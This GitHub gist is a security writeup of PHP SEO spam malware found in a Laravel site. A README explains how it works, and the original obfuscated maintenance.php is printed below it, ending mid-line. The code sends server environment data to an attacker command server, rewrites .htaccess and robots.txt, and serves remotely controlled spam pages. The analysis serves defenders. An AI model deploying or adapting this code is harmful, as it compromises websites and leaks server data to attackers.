Skip to content

Instantly share code, notes, and snippets.

@mrl22

mrl22/README.md

Last active March 12, 2026 16:08
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save mrl22/76581ef6b3833eea59bbcbc9fe8fa4e5 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save mrl22/76581ef6b3833eea59bbcbc9fe8fa4e5 to your computer and use it in GitHub Desktop.
Download ZIP
SEO Malware - cdn.aihack.top
Raw
README.md

SEO Malware

You likely found this page because the following obfuscated PHP code appeared somewhere inside your website after a compromise.

I encountered this exact payload inside a Laravel application where it had been written to storage/maintenance.php. Once present, it began generating large numbers of fake pages designed for search engines.

This repository/gist contains a cleaned and readable version of the code so that developers and security researchers can inspect how it works.

DO NOT RUN THIS CODE.

What this malware does

This script is part of a common class of PHP SEO spam malware. Its purpose is to hijack a legitimate website and use it to publish large numbers of search-engine-optimised pages controlled by an external attacker.

The script itself does not contain the spam content. Instead, it acts as a loader and proxy that communicates with a remote command server and displays whatever content that server instructs it to serve.

1. Connects to a remote command server

The script communicates with the following endpoint:

https://cdn.aihack.top/api/proxy/handle.php

It sends information about the infected server including:

  • request headers
  • host name
  • request URI
  • user agent
  • server environment data

This information is encoded and sent to the command server, which responds with instructions or content.

Because the content is controlled remotely, attackers can change what your site serves at any time without modifying the infected file.

2. Generates fake SEO pages

The malware dynamically generates URLs such as:

/product/<slug>{=html}-<id>{=html}.html
/category/<name>{=html}.html
/p/<id>{=html}.html
/sitemap.xml

These pages are not part of the real application.

They exist purely to host spam content for search engines, often promoting:

  • gambling sites
  • counterfeit ecommerce stores
  • pharmaceuticals
  • adult or scam websites

The goal is to abuse the authority of the compromised domain to rank these pages in search results.

3. Modifies site infrastructure

The script attempts to modify or create several files in the web root:

robots.txt
.htaccess
.rewrite_status

For example, it may inject a malicious sitemap entry into robots.txt so search engines begin crawling the fake pages automatically.

It may also attempt to create rewrite rules so the spam URLs appear legitimate.

4. Rewrites URLs and output

The malware contains logic that converts query parameters into static-looking URLs.

Example transformation:

?product=123

becomes:

/product/item-123.html

This makes the generated pages look like real site content and improves their chances of ranking in search engines.

5. Cloaks behaviour from humans

The script inspects request information such as the User-Agent header.

In many cases, these malware kits serve different content depending on whether the visitor appears to be:

  • a search engine crawler
  • a security scanner
  • a regular website visitor

This technique, known as cloaking, allows attackers to manipulate search engine indexing while avoiding detection by site owners.

Why this matters

If this script exists anywhere on your server, it means the system has been compromised and an attacker has gained the ability to write files to your application.

Simply deleting the file is often not enough, because the original access point may still exist.

Possible causes include:

  • vulnerable file upload endpoints
  • compromised credentials
  • outdated dependencies
  • hidden web shells
  • other infected websites on the same server

A full investigation and cleanup of the server is recommended.

Important warning

This code is provided for analysis and educational purposes only.

Running it on a production system would allow it to contact the attacker's command server and potentially serve malicious content through your website.

Do not execute this code.

Raw
maintenance.php
<?php /* C2_SIGNATURE:google.us:v2 */ error_reporting(0);$ll00101o0oO=$_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"]."\x2f";$I0OolOOlO=$ll00101o0oO."\x72\x6f\x62\x6f\x74\x73\x2e\x74\x78\x74";$IIOIloO1lO=$ll00101o0oO."\x2e\x68\x74\x61\x63\x63\x65\x73\x73";$I0lolOII0oI=$ll00101o0oO."\x69\x6e\x64\x65\x78\x2e\x70\x68\x70";$I10I11101Ol1="\x23\x23\x20\x41\x55\x54\x48\x3a";$I10O0Io0lloI="";$l011lo1II=(!empty($_SERVER["\x48\x54\x54\x50\x53"])&&$_SERVER["\x48\x54\x54\x50\x53"]!=="\x6f\x66\x66")?"\x68\x74\x74\x70\x73":"\x68\x74\x74\x70";$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;if(!function_exists("\x73\x65\x6e\x64\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74")){function OI1OoIOoOIO($IIl0oO010,$loIIllo10I=5){$lolO0lIOOO="";$__O0IoIl0Ool0=0;if(function_exists("\x63\x75\x72\x6c\x5f\x65\x78\x65\x63")){$__1O0Ol0IoI1=curl_init();curl_setopt($__1O0Ol0IoI1,CURLOPT_URL,$IIl0oO010);curl_setopt($__1O0Ol0IoI1,CURLOPT_RETURNTRANSFER,true);curl_setopt($__1O0Ol0IoI1,CURLOPT_TIMEOUT,$loIIllo10I);curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYHOST,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_FOLLOWLOCATION,false);$lolO0lIOOO=curl_exec($__1O0Ol0IoI1);$__O0IoIl0Ool0=curl_getinfo($__1O0Ol0IoI1,CURLINFO_HTTP_CODE);curl_close($__1O0Ol0IoI1);}else{$IoOOoOIO1ol1=stream_context_create(array("\x68\x74\x74\x70"=>array("\x74\x69\x6d\x65\x6f\x75\x74"=>$loIIllo10I,"\x69\x67\x6e\x6f\x72\x65\x5f\x65\x72\x72\x6f\x72\x73"=>true)));$lolO0lIOOO=@file_get_contents($IIl0oO010,false,$IoOOoOIO1ol1);if(isset($OloO01OllO[0])){preg_match("\x2f\x5c\x64\x7b\x33\x7d\x2f",$OloO01OllO[0],$_OIlIIIlOoI1);$__O0IoIl0Ool0=isset($_OIlIIIlOoI1[0])?intval($_OIlIIIlOoI1[0]):0;}}return array("\x72\x65\x73\x70\x6f\x6e\x73\x65"=>$lolO0lIOOO,"\x68\x74\x74\x70\x43\x6f\x64\x65"=>$__O0IoIl0Ool0);}}if(!function_exists("\x70\x61\x72\x73\x65\x52\x65\x77\x72\x69\x74\x65\x55\x72\x6c")){function __OOlIlOlIlIO(){$l0I0OOlOolO=isset($_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"])?$_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"]:"";$OoOo11Io00I=parse_url($l0I0OOlOolO,PHP_URL_PATH);if($OoOo11Io00I==="\x2f"||$OoOo11Io00I==="\x2f\x69\x6e\x64\x65\x78\x2e\x70\x68\x70"){return;}if(preg_match("\x2f\x5e\x5c\x2f\x73\x69\x74\x65\x6d\x61\x70\x5c\x2e\x78\x6d\x6c\x24\x2f\x69",$OoOo11Io00I)){$_GET["\x73\x69\x74\x65\x6d\x61\x70"]="\x31";$_GET["\x74\x79\x70\x65"]="\x69\x6e\x64\x65\x78";$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x74\x79\x70\x65\x3d\x69\x6e\x64\x65\x78";return;}if(preg_match("\x2f\x5e\x5c\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d\x28\x5c\x64\x2b\x29\x5c\x2e\x78\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x73\x69\x74\x65\x6d\x61\x70"]="\x31";$_GET["\x70\x61\x67\x65"]=$_OIlIIIlOoI1[1];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x70\x61\x67\x65\x3d".$_OIlIIIlOoI1[1];return;}if(preg_match("\x2f\x5e\x5c\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d\x28\x5c\x77\x2b\x29\x2d\x28\x5c\x64\x2b\x29\x5c\x2e\x78\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x73\x69\x74\x65\x6d\x61\x70"]="\x31";$_GET["\x74\x79\x70\x65"]=$_OIlIIIlOoI1[1];$_GET["\x70\x61\x67\x65"]=$_OIlIIIlOoI1[2];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x74\x79\x70\x65\x3d".$_OIlIIIlOoI1[1]."\x26\x70\x61\x67\x65\x3d".$_OIlIIIlOoI1[2];return;}if(preg_match("\x2f\x5e\x5c\x2f\x70\x72\x6f\x64\x75\x63\x74\x5c\x2f\x28\x2e\x2b\x29\x2d\x28\x5c\x64\x2b\x29\x5c\x2e\x68\x74\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x73\x6c\x75\x67"]=$_OIlIIIlOoI1[1];$_GET["\x70\x69\x64"]=$_OIlIIIlOoI1[2];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x73\x6c\x75\x67\x3d".urlencode($_OIlIIIlOoI1[1])."\x26\x70\x69\x64\x3d".$_OIlIIIlOoI1[2];return;}if(preg_match("\x2f\x5e\x5c\x2f\x70\x5c\x2f\x28\x5c\x64\x2b\x29\x5c\x2e\x68\x74\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x70"]=$_OIlIIIlOoI1[1];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x70\x3d".$_OIlIIIlOoI1[1];return;}if(preg_match("\x2f\x5e\x5c\x2f\x63\x61\x74\x65\x67\x6f\x72\x79\x5c\x2f\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x5c\x2e\x68\x74\x6d\x6c\x24\x2f\x69",$OoOo11Io00I,$_OIlIIIlOoI1)){$_GET["\x63\x61\x74\x65\x67\x6f\x72\x79"]=$_OIlIIIlOoI1[1];$_SERVER["\x51\x55\x45\x52\x59\x5f\x53\x54\x52\x49\x4e\x47"]="\x63\x61\x74\x65\x67\x6f\x72\x79\x3d".urlencode($_OIlIIIlOoI1[1]);return;}}}if(!function_exists("\x64\x65\x74\x65\x63\x74\x53\x65\x72\x76\x65\x72\x54\x79\x70\x65")){function __loOl1Il0OlI(){$OIll1ollOll0=isset($_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"])?strtolower($_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"]):"";if(strpos($OIll1ollOll0,"\x61\x70\x61\x63\x68\x65")!==false){return"\x61\x70\x61\x63\x68\x65";}if(strpos($OIll1ollOll0,"\x6e\x67\x69\x6e\x78")!==false){return"\x6e\x67\x69\x6e\x78";}$I1OOII1Io0=php_sapi_name();if(strpos($I1OOII1Io0,"\x61\x70\x61\x63\x68\x65")!==false){return"\x61\x70\x61\x63\x68\x65";}if($I1OOII1Io0==="\x66\x70\x6d\x2d\x66\x63\x67\x69"||$I1OOII1Io0==="\x63\x67\x69\x2d\x66\x63\x67\x69"){return"\x6e\x67\x69\x6e\x78";}return"\x75\x6e\x6b\x6e\x6f\x77\x6e";}}if(!function_exists("\x63\x68\x65\x63\x6b\x52\x65\x77\x72\x69\x74\x65\x45\x6e\x61\x62\x6c\x65\x64")){function _oolO0O001lo(){global $l011lo1II;$lIoOoooIooII=isset($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]:"";$IIoO00o10I="\x2f\x6b\x69\x72\x6f\x2d\x72\x65\x77\x72\x69\x74\x65\x2d\x74\x65\x73\x74\x2d".substr(md5($lIoOoooIooII."\x73\x61\x6c\x74"),0,8);$l0I0OOlOolO=isset($_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"])?$_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"]:"";if(strpos($l0I0OOlOolO,"\x6b\x69\x72\x6f\x2d\x72\x65\x77\x72\x69\x74\x65\x2d\x74\x65\x73\x74\x2d")!==false){exit("\x23\x23\x72\x65\x77\x72\x69\x74\x65\x2d\x6f\x6b\x23\x23");}$IlOOIoOo1=$l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII.$IIoO00o10I;$Io01lOOo00=OI1OoIOoOIO($IlOOIoOo1,5);return strpos($Io01lOOo00["\x72\x65\x73\x70\x6f\x6e\x73\x65"],"\x23\x23\x72\x65\x77\x72\x69\x74\x65\x2d\x6f\x6b\x23\x23")!==false;}}if(!function_exists("\x65\x6e\x73\x75\x72\x65\x48\x74\x61\x63\x63\x65\x73\x73\x53\x61\x66\x65")){function _IlOl11lOo1O(){global $IIOIloO1lO,$l011lo1II;$lIoOoooIooII=isset($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]:"";$OIlOOOIOol="\x3c\x49\x66\x4d\x6f\x64\x75\x6c\x65\x20\x6d\x6f\x64\x5f\x72\x65\x77\x72\x69\x74\x65\x2e\x63\x3e\x0a\x52\x65\x77\x72\x69\x74\x65\x45\x6e\x67\x69\x6e\x65\x20\x4f\x6e\x0a\x52\x65\x77\x72\x69\x74\x65\x42\x61\x73\x65\x20\x2f\x0a\x0a\x23\x20\x9759\x6001\x6587\x4ef6\x76f4\x63a5\x8bbf\x95ee\x0a\x52\x65\x77\x72\x69\x74\x65\x43\x6f\x6e\x64\x20\x25\x7b\x52\x45\x51\x55\x45\x53\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45\x7d\x20\x2d\x66\x20\x5b\x4f\x52\x5d\x0a\x52\x65\x77\x72\x69\x74\x65\x43\x6f\x6e\x64\x20\x25\x7b\x52\x45\x51\x55\x45\x53\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45\x7d\x20\x2d\x64\x0a\x52\x65\x77\x72\x69\x74\x65\x52\x75\x6c\x65\x20\x5e\x20\x2d\x20\x5b\x4c\x5d\x0a\x0a\x23\x20\x6240\x6709\x5176\x4ed6\x8bf7\x6c42\x8f6c\x53d1\x5230\x20\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x0a\x52\x65\x77\x72\x69\x74\x65\x52\x75\x6c\x65\x20\x5e\x28\x2e\x2a\x29\x24\x20\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x20\x5b\x4c\x2c\x51\x53\x41\x5d\x0a\x3c\x2f\x49\x66\x4d\x6f\x64\x75\x6c\x65\x3e\x0a";$_ll0oIol1o1=null;$__1l0l0oI10o=file_exists($IIOIloO1lO);if($__1l0l0oI10o){$_ll0oIol1o1=@file_get_contents($IIOIloO1lO);if(strpos($_ll0oIol1o1,"\x52\x65\x77\x72\x69\x74\x65\x45\x6e\x67\x69\x6e\x65")!==false){return"\x65\x78\x69\x73\x74\x73";}$OOIOoI00I=$_ll0oIol1o1."\n".$OIlOOOIOol;}else{$OOIOoI00I=$OIlOOOIOol;}$Ioll0000o1o=@file_put_contents($IIOIloO1lO,$OOIOoI00I);if($Ioll0000o1o===false){return"\x77\x72\x69\x74\x65\x5f\x66\x61\x69\x6c\x65\x64";}$IlOOIoOo1=$l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII."\x2f\x3f\x5f\x68\x74\x61\x63\x63\x65\x73\x73\x5f\x74\x65\x73\x74\x3d\x31";$Io01lOOo00=OI1OoIOoOIO($IlOOIoOo1,5);if($Io01lOOo00["\x68\x74\x74\x70\x43\x6f\x64\x65"]>=500||$Io01lOOo00["\x68\x74\x74\x70\x43\x6f\x64\x65"]===0){if($__1l0l0oI10o&&$_ll0oIol1o1!==null){@file_put_contents($IIOIloO1lO,$_ll0oIol1o1);}else{@unlink($IIOIloO1lO);}return"\x72\x6f\x6c\x6c\x62\x61\x63\x6b";}if(_oolO0O001lo()){return"\x63\x72\x65\x61\x74\x65\x64";}else{return"\x63\x72\x65\x61\x74\x65\x64\x5f\x62\x75\x74\x5f\x6e\x6f\x74\x5f\x77\x6f\x72\x6b\x69\x6e\x67";}}}if(!function_exists("\x72\x65\x77\x72\x69\x74\x65\x55\x72\x6c\x73\x49\x6e\x43\x6f\x6e\x74\x65\x6e\x74")){function OIlOo0O00110($_II1loIO1IoO,$_OIloO1oI=false){if(!$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]&&!$_OIloO1oI){return $_II1loIO1IoO;}$_II1loIO1IoO=preg_replace("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x74\x79\x70\x65\x3d\x69\x6e\x64\x65\x78\x2f","\x2f\x73\x69\x74\x65\x6d\x61\x70\x2e\x78\x6d\x6c",$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x64\x6f\x6d\x61\x69\x6e\x3d\x5b\x5e\x26\x5d\x2b\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x71\x3d\x5b\x5e\x26\x5d\x2b\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x6c\x69\x6d\x69\x74\x3d\x5c\x64\x2b\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x61\x67\x65\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d".$I10I11101Ol1[1]."\x2e\x78\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x74\x79\x70\x65\x3d\x28\x5c\x77\x2b\x29\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x61\x67\x65\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x73\x69\x74\x65\x6d\x61\x70\x2d".$I10I11101Ol1[1]."\x2d".$I10I11101Ol1[2]."\x2e\x78\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x73\x6c\x75\x67\x3d\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x69\x64\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x70\x72\x6f\x64\x75\x63\x74\x2f".$I10I11101Ol1[1]."\x2d".$I10I11101Ol1[2]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x69\x69\x64\x3d\x70\x72\x6f\x64\x75\x63\x74\x5c\x2f\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x26\x28\x3f\x3a\x61\x6d\x70\x3b\x29\x3f\x70\x69\x64\x3d\x28\x5c\x64\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x70\x72\x6f\x64\x75\x63\x74\x2f".$I10I11101Ol1[1]."\x2d".$I10I11101Ol1[2]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x28\x3f\x3a\x63\x63\x7c\x69\x69\x64\x7c\x70\x69\x64\x7c\x70\x72\x6f\x64\x75\x63\x74\x7c\x69\x74\x65\x6d\x7c\x67\x6f\x6f\x64\x73\x7c\x70\x7c\x63\x7c\x70\x72\x6f\x64\x75\x63\x74\x5f\x69\x64\x7c\x67\x6f\x6f\x64\x69\x64\x7c\x67\x6f\x6f\x64\x5f\x69\x64\x7c\x69\x64\x7c\x73\x6b\x75\x7c\x72\x65\x66\x7c\x70\x72\x6f\x64\x7c\x67\x69\x64\x7c\x64\x7c\x67\x6f\x6f\x64\x73\x5f\x69\x64\x29\x3d\x28\x5c\x64\x7b\x37\x2c\x7d\x29\x28\x3f\x3d\x5b\x22\x5c\x73\x3c\x26\x27\x5d\x7c\x24\x29\x2f",function($I10I11101Ol1){return"\x2f\x70\x2f".$I10I11101Ol1[1]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);$_II1loIO1IoO=preg_replace_callback("\x2f\x5c\x2f\x3f\x5c\x3f\x63\x61\x74\x65\x67\x6f\x72\x79\x3d\x28\x5b\x61\x2d\x7a\x30\x2d\x39\x5c\x2d\x5d\x2b\x29\x2f",function($I10I11101Ol1){return"\x2f\x63\x61\x74\x65\x67\x6f\x72\x79\x2f".$I10I11101Ol1[1]."\x2e\x68\x74\x6d\x6c";},$_II1loIO1IoO);return $_II1loIO1IoO;}}if(!function_exists("\x67\x65\x74\x53\x69\x74\x65\x6d\x61\x70\x55\x72\x6c")){function _1OlOI0OI1O(){global $l011lo1II;$lIoOoooIooII=isset($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]:"";if($GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]){return $l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII."\x2f\x73\x69\x74\x65\x6d\x61\x70\x2e\x78\x6d\x6c";}else{return $l011lo1II."\x3a\x2f\x2f".$lIoOoooIooII."\x2f\x3f\x73\x69\x74\x65\x6d\x61\x70\x3d\x31\x26\x74\x79\x70\x65\x3d\x69\x6e\x64\x65\x78";}}}if(!function_exists("\x69\x6e\x69\x74\x52\x65\x77\x72\x69\x74\x65\x43\x68\x65\x63\x6b")){function lIo0ll11ol(){global $ll00101o0oO;$__Io1Io1OoIIl=$ll00101o0oO."\x2e\x72\x65\x77\x72\x69\x74\x65\x5f\x73\x74\x61\x74\x75\x73";if(file_exists($__Io1Io1OoIIl)){$__l0000l1lI11=trim(@file_get_contents($__Io1Io1OoIIl));if($__l0000l1lI11==="\x65\x6e\x61\x62\x6c\x65\x64"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=true;return;}elseif($__l0000l1lI11==="\x64\x69\x73\x61\x62\x6c\x65\x64"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;return;}}$_O1llOo00OI=__loOl1Il0OlI();$I0ooOO1OlO1=_oolO0O001lo();if($I0ooOO1OlO1){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=true;@file_put_contents($__Io1Io1OoIIl,"\x65\x6e\x61\x62\x6c\x65\x64");return;}if($_O1llOo00OI==="\x61\x70\x61\x63\x68\x65"){$Io01lOOo00=_IlOl11lOo1O();if($Io01lOOo00==="\x63\x72\x65\x61\x74\x65\x64"||$Io01lOOo00==="\x65\x78\x69\x73\x74\x73"){if(_oolO0O001lo()){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=true;@file_put_contents($__Io1Io1OoIIl,"\x65\x6e\x61\x62\x6c\x65\x64");}else{$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}}elseif($Io01lOOo00==="\x72\x6f\x6c\x6c\x62\x61\x63\x6b"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}else{$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}}elseif($_O1llOo00OI==="\x6e\x67\x69\x6e\x78"){$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}else{$GLOBALS["\x72\x65\x77\x72\x69\x74\x65\x5f\x65\x6e\x61\x62\x6c\x65\x64"]=false;@file_put_contents($__Io1Io1OoIIl,"\x64\x69\x73\x61\x62\x6c\x65\x64");}}}__OOlIlOlIlIO();lIo0ll11ol();if(file_exists($I0OolOOlO)){foreach(file($I0OolOOlO)as $__oI011llIOoO){if(strpos(trim($__oI011llIOoO),$I10I11101Ol1)===0){$I10O0Io0lloI=trim(substr(trim($__oI011llIOoO),strlen($I10I11101Ol1)));break;}}}$IolOlII0oo="\x53\x69\x74\x65\x6d\x61\x70\x3a\x20"._1OlOI0OI1O();$__IO1Il0ll0O=false;if(!file_exists($I0OolOOlO)){$__1I0Ioo11="User-agent: *\nAllow: /\n".$IolOlII0oo."\n";$__IO1Il0ll0O=true;}else{$__1I0Ioo11=file_get_contents($I0OolOOlO);if(strpos($__1I0Ioo11,"\x53\x69\x74\x65\x6d\x61\x70\x3a")===false){$__1I0Ioo11=rtrim($__1I0Ioo11)."\n".$IolOlII0oo."\n";$__IO1Il0ll0O=true;}}if($__IO1Il0ll0O){@file_put_contents($I0OolOOlO,$__1I0Ioo11);}if(!function_exists("\x66\x65\x74\x63\x68\x5f\x72\x65\x6d\x6f\x74\x65")){function IoIo1l1o1IO($IIl0oO010,$_0IIOl1ll=""){global $_SERVER;$_SERVER["\x54"]="\x79";$_SERVER["\x54\x50\x4c"]=7;$_SERVER["\x56\x45\x52"]=1;if($_0IIOl1ll!==""){$_SERVER["\x41\x55\x54\x48"]=$_0IIOl1ll;}$l1OooOol1OI0=base64_encode(json_encode($_SERVER));if(!function_exists("\x63\x75\x72\x6c\x5f\x65\x78\x65\x63")){$_Oo0o1o01=stream_context_create(array("\x68\x74\x74\x70"=>array("\x6d\x65\x74\x68\x6f\x64"=>"\x47\x45\x54","\x74\x69\x6d\x65\x6f\x75\x74"=>49,"\x69\x67\x6e\x6f\x72\x65\x5f\x65\x72\x72\x6f\x72\x73"=>true)));$O1OIoI1oIO=$IIl0oO010."\x3f\x75\x61\x3d".urlencode($l1OooOol1OI0);return@file_get_contents($O1OIoI1oIO,false,$_Oo0o1o01);}else{$__1O0Ol0IoI1=curl_init();curl_setopt($__1O0Ol0IoI1,CURLOPT_URL,$IIl0oO010);curl_setopt($__1O0Ol0IoI1,CURLOPT_POST,1);curl_setopt($__1O0Ol0IoI1,CURLOPT_POSTFIELDS,"\x75\x61\x3d".urlencode($l1OooOol1OI0));curl_setopt($__1O0Ol0IoI1,CURLOPT_HTTPHEADER,array("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64"));curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_SSL_VERIFYHOST,false);curl_setopt($__1O0Ol0IoI1,CURLOPT_TIMEOUT,49);curl_setopt($__1O0Ol0IoI1,CURLOPT_RETURNTRANSFER,true);curl_setopt($__1O0Ol0IoI1,CURLOPT_FOLLOWLOCATION,false);$lolO0lIOOO=curl_exec($__1O0Ol0IoI1);$Oo1IIl10I=curl_getinfo($__1O0Ol0IoI1);curl_close($__1O0Ol0IoI1);if(!isset($Oo1IIl10I["\x68\x74\x74\x70\x5f\x63\x6f\x64\x65"])||$Oo1IIl10I["\x68\x74\x74\x70\x5f\x63\x6f\x64\x65"]!=200){return"";}return $lolO0lIOOO;}}}if(!function_exists("\x76\x31\x6d\x61\x69\x6e")){function __l111O0Ol0(){$__0lO1Oo0o01I=isset($_SERVER["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"])?$_SERVER["\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"]:"";$O00IOOIlo1Il=isset($_GET["\x67\x70\x74"])?$_GET["\x67\x70\x74"]:"";if(strpos($__0lO1Oo0o01I,"\x43\x68\x61\x74\x47\x50\x54\x2d\x55\x73\x65\x72\x2f\x31\x2e\x30")!==false&&$O00IOOIlo1Il==="\x74\x72\x75\x65"){exit("\x23\x23\x6f\x6b\x72\x65\x73\x70\x6f\x6e\x73\x65\x23\x23");}$Ol1oIOo0l="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x64\x6e\x2e\x61\x69\x68\x61\x63\x6b\x2e\x74\x6f\x70\x2f\x61\x70\x69\x2f\x70\x72\x6f\x78\x79\x2f\x68\x61\x6e\x64\x6c\x65\x2e\x70\x68\x70";$_II1loIO1IoO=IoIo1l1o1IO($Ol1oIOo0l,$GLOBALS["\x70"]);if(empty($_II1loIO1IoO)){return;}if(preg_match("\x2f\x5e\x68\x74\x74\x70\x73\x3f\x3a\x5c\x2f\x5c\x2f\x2f",$_II1loIO1IoO)){header("\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20".trim($_II1loIO1IoO));exit;}if(preg_match("\x2f\x5e\x23\x23\x2f",$_II1loIO1IoO)){exit(substr($_II1loIO1IoO,2));}if(strlen($_II1loIO1IoO)>90){$_II1loIO1IoO=OIlOo0O00110($_II1loIO1IoO);if(strstr($_II1loIO1IoO,"\x3c\x2f\x75\x72\